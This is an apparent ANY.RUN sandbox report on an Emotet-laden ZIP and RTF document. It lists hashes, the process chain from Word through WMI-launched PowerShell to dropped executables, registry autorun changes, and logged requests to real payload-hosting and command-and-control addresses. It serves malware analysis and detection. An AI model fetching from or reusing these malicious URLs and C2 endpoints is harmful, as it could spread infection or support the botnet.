File name: 7fc9d667d93145a726de.zip
Full analysis: https://app.any.run/tasks/9fc22f3e-aa51-445d-b0b7-1952b1da5651
Verdict: Malicious activity
Threats: Emotet
Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims, but even private users get infected in mass spam email campaigns.

Analysis date: September 18, 2019, 15:26:56
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: emotet, trojan, emotet-doc
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5: 02F93512E707CB86ED027FAFEED2F5E6
SHA1: 00BBBE060C33FEC9AFC2B915CE4E7800B4C761E5
SHA256: E3B86E4B26E65FC6F8EA29EDFAC3F88790FD578F0A0D4FF62293E7251C291BF1
SSDEEP: 3072:0Hvn9W90aPKyZUj8oCPJBXOZjQ5uCGSNKYnE3875pfOQI2xcnrp7uK/VgdTKsTBe:Kvn0vKq1oMe1Q7GSNtEM7Lfzxcj9gdT0

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided as is, for user acknowledgement. ANY.RUN does not guarantee the maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 523.exe (PID: 2572)
      • 523.exe (PID: 3336)
      • 523.exe (PID: 2660)
      • easywindow.exe (PID: 3832)
      • 523.exe (PID: 3524)
      • easywindow.exe (PID: 3908)
      • easywindow.exe (PID: 1132)
      • easywindow.exe (PID: 2880)
    • Emotet process was detected

      • 523.exe (PID: 3524)
    • EMOTET was detected

      • easywindow.exe (PID: 2880)
    • Changes the autorun value in the registry

      • easywindow.exe (PID: 2880)
    • Connects to CnC server

      • easywindow.exe (PID: 2880)
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 3040)
    • PowerShell script executed

      • powershell.exe (PID: 3040)
    • Creates files in the user directory

      • powershell.exe (PID: 3040)
    • Application launched itself

      • 523.exe (PID: 2660)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3040)
      • 523.exe (PID: 3524)
    • Starts itself from another location

      • 523.exe (PID: 3524)
  • INFO

    • Manual execution by user

      • WINWORD.EXE (PID: 3228)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3228)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3228)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD: .zip | ZIP compressed archive (100)

EXIF (ZIP):
ZipRequiredVersion: 788
ZipBitFlag: 0x0001
ZipCompression: Deflated
ZipModifyDate: 2019:09:18 15:26:10
ZipCRC: 0xa81cb7f9
ZipCompressedSize: 148624
ZipUncompressedSize: 272640
ZipFileName: 7fc9d667d93145a726ded6603cf1158362125eb5152db3f00596d182f3dd3a3c.bin
No data.
All screenshots are available in the full report
Total processes: 48
Monitored processes: 11
Malicious processes: 7
Suspicious processes: 1

Behavior graph (rendered as an interactive image in the full report; node labels only): winrar.exe, winword.exe, powershell.exe, 523.exe (four instances, one flagged #EMOTET), easywindow.exe (four instances, one flagged #EMOTET); edges are labelled "start" and "drop and start".

Process information

PID 3544: WinRAR.exe
  CMD: "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\7fc9d667d93145a726de.zip"
  Path: C:\Program Files\WinRAR\WinRAR.exe
  Parent process: explorer.exe
  User: admin
  Company: Alexander Roshal
  Integrity Level: MEDIUM
  Description: WinRAR archiver
  Version: 5.60.0

PID 3228: WINWORD.EXE
  CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\7fc9d667d93145a726ded6603cf1158362125eb5152db3f00596d182f3dd3a3c.rtf"
  Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
  Parent process: explorer.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Microsoft Word
  Version: 14.0.6024.1000

PID 3040: powershell.exe
  CMD: powershell -encod [encoded command not preserved in this copy of the report]
  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Parent process: wmiprvse.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Windows PowerShell
  Exit code: 0
  Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 3336: 523.exe
  CMD: "C:\Users\admin\523.exe"
  Path: C:\Users\admin\523.exe
  Parent process: powershell.exe
  User: admin
  Integrity Level: MEDIUM
  Exit code: 0

PID 2572: 523.exe
  CMD: "C:\Users\admin\523.exe"
  Path: C:\Users\admin\523.exe
  Parent process: 523.exe
  User: admin
  Integrity Level: MEDIUM
  Exit code: 0

PID 2660: 523.exe
  CMD: --d05e77b4
  Path: C:\Users\admin\523.exe
  Parent process: 523.exe
  User: admin
  Integrity Level: MEDIUM
  Exit code: 0

PID 3524: 523.exe
  CMD: --d05e77b4
  Path: C:\Users\admin\523.exe
  Parent process: 523.exe
  User: admin
  Integrity Level: MEDIUM
  Exit code: 0

PID 1132: easywindow.exe
  CMD: "C:\Users\admin\AppData\Local\easywindow\easywindow.exe"
  Path: C:\Users\admin\AppData\Local\easywindow\easywindow.exe
  Parent process: 523.exe
  User: admin
  Integrity Level: MEDIUM
  Exit code: 0

PID 3832: easywindow.exe
  CMD: "C:\Users\admin\AppData\Local\easywindow\easywindow.exe"
  Path: C:\Users\admin\AppData\Local\easywindow\easywindow.exe
  Parent process: easywindow.exe
  User: admin
  Integrity Level: MEDIUM
  Exit code: 0

PID 3908: easywindow.exe
  CMD: --fd47f3b8
  Path: C:\Users\admin\AppData\Local\easywindow\easywindow.exe
  Parent process: easywindow.exe
  User: admin
  Integrity Level: MEDIUM
  Exit code: 0
Total events: 3 134
Read events: 2 636
Write events: 0
Delete events: 0

Modification events: No data
Executable files: 2
Suspicious files: 10
Text files: 2
Unknown types: 45

Dropped files

PID 3544 (WinRAR.exe)
  Filename: C:\Users\admin\AppData\Local\Temp\Rar$DRb3544.44410\7fc9d667d93145a726ded6603cf1158362125eb5152db3f00596d182f3dd3a3c.bin
  Type: not shown
  MD5: not shown
  SHA256: not shown

PID 3228 (WINWORD.EXE)
  Filename: C:\Users\admin\AppData\Local\Temp\CVR1126.tmp.cvr
  Type: not shown
  MD5: not shown
  SHA256: not shown

PID 3228 (WINWORD.EXE)
  Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AC0DB8CC.wmf
  Type: wmf
  MD5: 471CAE0A8DBA69FE95345531EF1B0ECA
  SHA256: BEFDF361E8F16DA86351089B70243C643C3ED649D077433F861917E55C0AAB83

PID 3228 (WINWORD.EXE)
  Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E238A58E.wmf
  Type: wmf
  MD5: D380A71A1B03203B26489F70EB320A64
  SHA256: DD06DE5BAC74F5593922EC5CF92F079655914BED2F2F755F1C91FD8324F6FA2E

PID 3228 (WINWORD.EXE)
  Filename: C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd
  Type: tlb
  MD5: 64ACC42DAE6263A8CD90149E1F478CD9
  SHA256: 9F349BD46627D00F3510892ED7992CA4BA765AC5A0B65A9B7C391B5257707C89

PID 3228 (WINWORD.EXE)
  Filename: C:\Users\admin\Desktop\~$c9d667d93145a726ded6603cf1158362125eb5152db3f00596d182f3dd3a3c.rtf
  Type: pgc
  MD5: 9926DDF83F763B82C5F809871D9AEF03
  SHA256: 923CF16F41EF4AE4B189C0289A4A4FC1B7DD9776A9DE6BEDC1417624E4272512

PID 3228 (WINWORD.EXE)
  Filename: C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
  Type: text
  MD5: 1411C5AC7CB5904CAF3FB9623E3B38D6
  SHA256: 0CAA76A6781CA740A9F4D1A715F9EF07D4EEBCD1F38C0E87219A22DC44093F86

PID 3228 (WINWORD.EXE)
  Filename: C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
  Type: pgc
  MD5: FE5518FB557C82325D55D619EA9E645E
  SHA256: 0693EC0166205AE8069F572B9EF3252CB7B29E24B6204F1E25A5D3BA45989749

PID 3228 (WINWORD.EXE)
  Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1E6E9F55.wmf
  Type: wmf
  MD5: 3F88C0B54BF2695896916D49A99233EC
  SHA256: B2A537443977561979E19EAC9074421824008C287B2F01AF47A79E72335AA724

PID 3228 (WINWORD.EXE)
  Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\403FAA5D.wmf
  Type: wmf
  MD5: BA2D6BD46C90B2289E463FC0BB790DBB
  SHA256: DCF519D8EAD86232CD5DDA6A019F91E1C9BF08BB2354153E60ADC631B9262312
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 5
TCP/UDP connections: 6
DNS requests: 4
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
2880 | easywindow.exe | POST | - | 59.152.93.46:443 | http://59.152.93.46:443/entries/site/ | BD | - | - | malicious
3040 | powershell.exe | GET | 200 | 156.67.209.58:80 | http://shael.org/cgi-sys/suspendedpage.cgi | SG | html | 7.40 Kb | malicious
2880 | easywindow.exe | POST | - | 91.92.191.134:8080 | http://91.92.191.134:8080/ringin/ | IR | - | - | malicious
2880 | easywindow.exe | POST | 200 | 178.254.6.27:7080 | http://178.254.6.27:7080/health/symbols/nsip/merge/ | DE | binary | 148 b | malicious
3040 | powershell.exe | GET | 302 | 156.67.209.58:80 | http://shael.org/hosting/TYXchcKkHz/ | SG | html | 681 b | malicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
3040 | powershell.exe | 156.67.209.58:80 | shael.org | Hostinger International Limited | SG | unknown
2880 | easywindow.exe | 185.129.92.210:7080 | - | Bravo Online Systems LLC | AZ | malicious
2880 | easywindow.exe | 91.92.191.134:8080 | - | Information Technology Company (ITC) | IR | malicious
2880 | easywindow.exe | 178.254.6.27:7080 | - | EVANZO e-commerce GmbH | DE | malicious
3040 | powershell.exe | 89.46.105.48:80 | www.lottizzazionesavarra.it | Aruba S.p.A. | IT | suspicious
2880 | easywindow.exe | 59.152.93.46:443 | - | Zipnet Limited DKB AS number | BD | malicious

DNS requests

Domain | IP | Reputation
shael.org | 156.67.209.58 | malicious
www.lottizzazionesavarra.it | 89.46.105.48 | suspicious
dns.msftncsi.com | 131.107.255.255 | shared

Threats

PID | Process | Class | Message
3040 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP
3040 | powershell.exe | A Network Trojan was detected | AV INFO Suspicious EXE download from WordPress folder
3040 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3040 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP
2880 | easywindow.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019)
2880 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet
2880 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet
2880 | easywindow.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST)
2880 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet
8 ETPRO signatures available at the full report
No debug info